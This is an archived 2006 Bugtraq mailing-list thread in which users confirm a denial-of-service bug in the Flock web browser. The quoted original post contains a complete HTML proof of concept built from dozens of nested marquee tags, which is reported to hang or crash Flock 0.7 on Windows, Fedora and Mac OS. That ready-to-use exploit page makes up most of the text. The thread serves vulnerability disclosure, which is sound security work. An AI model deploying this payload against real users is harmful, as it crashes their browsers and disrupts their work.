[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <F2D6FC17-2809-4156-A28A-3D64353123C6@cmtww.com>
Date: Tue, 4 Jul 2006 16:54:37 +0100
From: .myke lyons <Myke.Lyons@...ww.com>
To: bugtraq@...urityfocus.com
Subject: Re: flock d0s exploit remote. beta 1 (v0.7)
I have confirmed the same on Mac OS 10.4.7 on an 2.16ghz Intel Core Duo.
thanks,
.myke
On 23 Jun 2006, at 17:30, Chris Rothecker wrote:
>
> Tried this in Flock 0.7.1 on Fedora Core 5 and the browser does hang.
>
>
>
> On Thu, 22 Jun 2006 18:27:07 -0600, <co296@....com> wrote:
>
>> Credit's to n00b..Round 2 of the marquee tag's bug...
>>
>> ive found a dos in flock web browser and crash's the browser ive
>> provided a proof of concept :P...
>> thnx
>> tested on win xp pro service pack 1..
>> http://www.flock.com/
>>
>>
>> <html>
>> <head>
>> <title>flox web browser remote dos exploit by n00b :: http://
>> www.flock.com/ ::..</title>
>> <meta http-equiv="Content-Type" content="text/html;
>> charset=iso-8859-1">
>> </head>
>>
>> <body>
>> <p align=center>
>> <font size=+3 color=red>
>> <marquee width=175%>
>> Credit's to n00b..Round {2} of the marquee bug's...
>> </marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>> <marquee>
>>
>>
>>
>>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </marquee>
>> </font>
>> </p>
>> </body>
>> </html>
>
>
>
> --
> --
> Chris Rothecker
> System Administrator
> Live Global Bid Inc.
> http://www.liveglobalbid.com/
> chris@...eglobalbid.com
> Phone: (306) 584 1383
Powered by blists - more mailing lists